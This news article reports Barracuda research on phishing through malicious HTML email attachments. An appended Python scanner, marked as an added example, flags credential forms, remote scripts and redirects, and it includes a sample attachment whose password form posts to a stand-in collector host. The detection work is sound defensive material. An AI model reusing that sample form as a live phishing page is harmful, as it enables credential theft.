Researchers at IT security firm Barracuda Networks recently analysed data on the tens of millions of attachments scanned by Barracuda systems over the past month. They found almost 21% of all HTML attachments scanned by the company to be malicious.
HTML attachments are commonly used in email communication. They are used in particular for system-generated email reports that users might receive regularly. These messages include URL links to the actual report. Attackers have been embedding HTML attachments in emails disguised as a weekly report, tricking users into clicking on phishing links. This is a successful technique because hackers no longer need to include malicious links in an email, allowing them to easily bypass anti-spam and anti-virus systems.
The malicious HTML attachments are being used for credential phishing. They include a link to a phishing site which, when opened, redirects to a third-party machine that asks users to enter their credentials to access information or download a file that may contain malware. Hackers don’t always need to create a fake website. They can create a phishing form directly embedded in the attachment, ultimately sending phishing sites as attachments instead of links.
“These attacks are difficult to detect because HTML attachments per se are not malicious,” says Parag Khurana, country manager, Barracuda Networks India.
Attackers don’t include malware in the attachment, instead using multiple redirects with JavaScript libraries hosted elsewhere. “Potential protection against these attacks should take into account an entire email with HTML attachments, looking at all redirects and analysing the content of the email for malicious intent,” he adds.
Because such attachments are hard to identify accurately, machine learning and static code analysis offer the best solutions for dealing with them, as they evaluate an email to identify and block malicious HTML attachments. Meanwhile, given the volume of such attacks, users should be wary of all HTML attachments, especially those from sources they haven’t encountered before.
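One way the static checks mentioned above might look, as an added example (not Barracuda's code and not part of the original article): a Python scanner that flags the traits the article describes in an HTML attachment, namely an embedded credential form, scripts hosted elsewhere, and redirects. The indicator names and the sample hostnames are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Script-based navigation that sends the reader to another page on open.
JS_REDIRECT = re.compile(r"location(?:\.href)?\s*=|location\.(?:replace|assign)\s*\(", re.I)

def _remote(url):
    """True when the URL names a host, i.e. it points outside the attachment."""
    return bool(urlparse(url or "").netloc)

class AttachmentScanner(HTMLParser):
    """Collects static indicators (hypothetical names) from one HTML attachment."""
    def __init__(self):
        super().__init__()
        self.findings = set()
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.findings.add("password-field")
        elif tag == "form" and _remote(a.get("action")):
            self.findings.add("form-posts-to-remote-host")
        elif tag == "script":
            self._in_script = True
            if _remote(a.get("src")):
                self.findings.add("remote-script")
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.add("meta-refresh-redirect")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and JS_REDIRECT.search(data):
            self.findings.add("script-redirect")

def scan_attachment(html):
    """Return the sorted list of indicators found in the attachment's HTML."""
    scanner = AttachmentScanner()
    scanner.feed(html)
    scanner.close()
    return sorted(scanner.findings)

# Constructed sample (not real mail): a credential form inside the attachment.
SAMPLE_FORM = ('<form action="https://collector.example/submit" method="post">'
               '<input name="u"><input type="password" name="p"></form>'
               '<script src="https://cdn.example/lib.js"></script>'
               '<script>window.location.href = "https://login.example/";</script>')
```

Indicators like these are heuristics to feed into a wider verdict on the whole email, since legitimate report attachments can also load remote scripts.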
In case malicious emails do get through, it’s important to keep post-delivery remediation tools ready to quickly identify and remove such emails from all user inboxes. Automated incident response can help do this quickly before attacks spread through an organisation, and account takeover protection can monitor and alert users to suspicious account activity if login credentials are compromised.
Source: www.financialexpress.com